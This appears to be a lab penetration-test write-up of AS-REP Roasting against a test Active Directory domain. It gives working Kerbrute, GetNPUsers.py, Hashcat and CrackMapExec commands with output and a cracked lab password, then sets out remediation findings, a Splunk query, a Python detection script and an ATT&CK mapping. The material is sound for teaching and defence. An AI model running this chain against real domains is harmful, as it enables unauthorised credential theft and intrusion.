Unauthenticated user enumeration, AS-REP hash extraction from a pre-auth disabled account, offline password cracking in under 2 minutes — valid domain credentials obtained without ever authenticating to the domain.
| Field | Detail |
|---|---|
| Target | Internal Active Directory Network — domain: ad.lab |
| Objective | Gain valid domain credentials without authentication |
| Attack Vector | AS-REP Roasting + offline password cracking |
| Difficulty | Medium |
| Starting Position | Unauthenticated network access only |
| Tools | Kerbrute, Impacket GetNPUsers.py, Hashcat, CrackMapExec |
Starting with nothing but network access to the domain, user enumeration via Kerbrute identified five valid domain accounts including asrep.user — an account with Kerberos pre-authentication disabled. The AS-REP hash was extracted without supplying any credentials. Hashcat cracked the hash in 1 minute 46 seconds using rockyou.txt. Valid domain credentials obtained: asrep.user:ASREPRoast1!.
Kerbrute sends AS-REQ packets to the domain controller and identifies valid usernames based on Kerberos error responses — without ever authenticating. Invalid usernames return KDC_ERR_C_PRINCIPAL_UNKNOWN; valid usernames return a different response code, confirming existence.
```text
kerbrute userenum --dc 10.80.80.2 -d ad.lab /usr/share/wordlists/usernames.txt
[*] Valid user => john.smith
[*] Valid user => asrep.user
[*] Valid user => svc_sql
[*] Valid user => svc_backup
[*] Valid user => admin
```
AS-REP Roasting exploits accounts that have Kerberos pre-authentication disabled. Normally, a client must prove knowledge of its password (pre-authentication) before the KDC returns an AS-REP containing a TGT. With pre-auth disabled, the KDC will answer an AS-REQ for that account from anyone — and the AS-REP contains a portion encrypted with a key derived from the user's password, which can be extracted and cracked offline.
```text
# Extract AS-REP hashes — no credentials required
GetNPUsers.py ad.lab/ -usersfile valid_users.txt -dc-ip 10.80.80.2 -no-pass -format hashcat
$krb5asrep$23$asrep.user@AD.LAB:a1b2c3d4e5f6...
```
The returned hash is in Hashcat mode 18200 format ($krb5asrep$23$) — ready for offline cracking.
```text
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt --force
$krb5asrep$23$asrep.user@AD.LAB:[hash]:ASREPRoast1!
Session..........: hashcat
Status...........: Cracked
Time.Estimated...: 0 secs (1 min, 46 secs elapsed)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
```
Credentials obtained: asrep.user:ASREPRoast1!
```text
# Validate credentials
crackmapexec smb 10.80.80.2 -u asrep.user -p ASREPRoast1!
SMB 10.80.80.2 445 DC01 [+] AD.LAB\asrep.user:ASREPRoast1!
```
With valid domain credentials, escalation paths now available include: Kerberoasting service accounts, AD enumeration with BloodHound, lateral movement, and credential spraying against other accounts.
| Attribute | AS-REP Roasting | Kerberoasting |
|---|---|---|
| Authentication required | No — unauthenticated | Yes — valid domain credentials required |
| Target accounts | Pre-authentication disabled accounts | Accounts with registered SPNs |
| Hash type | AS-REP ($krb5asrep$23$ — mode 18200) | TGS ($krb5tgs$23$ — mode 13100) |
| Privilege required | None — network access only | Standard domain user |
| Detection artifacts | Event ID 4768 (without pre-auth) | Event ID 4769 (service ticket requests) |
| Prevalence | Lower (configuration error) | Higher (service accounts are common) |
| # | Finding | Severity | Recommendation |
|---|---|---|---|
| 1 | Kerberos pre-authentication disabled on asrep.user | Critical | Enable Kerberos pre-authentication on all accounts — disable only with explicit documented justification |
| 2 | Weak password cracked in under 2 minutes | High | Enforce 16+ character passwords for all domain accounts; implement LAPS for service accounts |
| 3 | No monitoring of AS-REQ without pre-auth | High | Alert on Event ID 4768 with pre-authentication not required; alert on high-volume AS-REP requests |
| 4 | Domain usernames enumerable without credentials | Medium | Implement user enumeration controls; monitor for Kerbrute-style username spraying patterns |
```text
# Splunk — Detect AS-REP Roasting (Event ID 4768 without pre-auth)
index=security EventCode=4768 PreAuthType=0
| stats count by TargetUserName, IpAddress
| where count > 5
| sort -count
```
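The same detection logic as the Splunk search above, implemented as a stand-alone script so it can be tested against exported logs. This is an added example, not part of the original report or any of the tools it names; the 4768 events are constructed in key=value form, and the field names (TargetUserName, IpAddress, PreAuthType, TicketEncryptionType) are assumed to match how the SIEM parses the event. It goes one step further than the search by also noting whether the no-pre-auth requests negotiated RC4 (etype 23), which is the encryption type behind the $krb5asrep$23$ / mode 18200 hashes seen in this engagement.

```python
import re
from collections import Counter

# Constructed sample 4768 events (not real log data): a few normal
# pre-authenticated TGT requests, one legitimate logon for the pre-auth
# disabled account, and a burst of PreAuthType=0 AS-REQs from one source.
SAMPLE_4768_EVENTS = [
    "EventCode=4768 TargetUserName=john.smith IpAddress=10.80.80.50 PreAuthType=2 TicketEncryptionType=0x12",
    "EventCode=4768 TargetUserName=svc_sql IpAddress=10.80.80.51 PreAuthType=2 TicketEncryptionType=0x12",
    "EventCode=4768 TargetUserName=asrep.user IpAddress=10.80.80.60 PreAuthType=0 TicketEncryptionType=0x12",
] + [
    "EventCode=4768 TargetUserName=asrep.user IpAddress=10.80.80.99 PreAuthType=0 TicketEncryptionType=0x17"
    for _ in range(7)
]

RC4_HMAC = "0x17"  # etype 23: the $krb5asrep$23$ format cracked with hashcat -m 18200


def parse_event(line):
    """Turn one key=value event line into a dict (assumed log layout)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def asrep_roast_candidates(lines, threshold=5):
    """Count 4768 events with PreAuthType=0 per (user, source IP) and return
    the pairs above the threshold, mirroring the Splunk search. Each hit also
    records whether any of its requests used RC4, the weakest common etype."""
    counts = Counter()
    rc4_seen = set()
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventCode") != "4768" or ev.get("PreAuthType") != "0":
            continue
        key = (ev.get("TargetUserName"), ev.get("IpAddress"))
        counts[key] += 1
        if ev.get("TicketEncryptionType", "").lower() == RC4_HMAC:
            rc4_seen.add(key)
    return {
        key: {"count": n, "rc4": key in rc4_seen}
        for key, n in counts.items()
        if n > threshold
    }


if __name__ == "__main__":
    for (user, ip), info in sorted(asrep_roast_candidates(SAMPLE_4768_EVENTS).items()):
        print(f"ALERT AS-REP roasting candidate: {user} from {ip} "
              f"({info['count']} no-preauth AS-REQs, RC4={info['rc4']})")
```

The single legitimate PreAuthType=0 logon from 10.80.80.60 stays below the threshold, which is why the count-based rule is needed rather than alerting on every no-pre-auth request for a known pre-auth-disabled account.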
| Technique ID | Technique |
|---|---|
| T1595 | Active Scanning — username enumeration via Kerbrute |
| T1558.004 | AS-REP Roasting — hash extraction from pre-auth disabled accounts |
| T1110.002 | Password Cracking — offline hash cracking with Hashcat |
| T1087.002 | Domain Account Discovery — valid username enumeration |
| T1078 | Valid Accounts — obtained working domain credentials |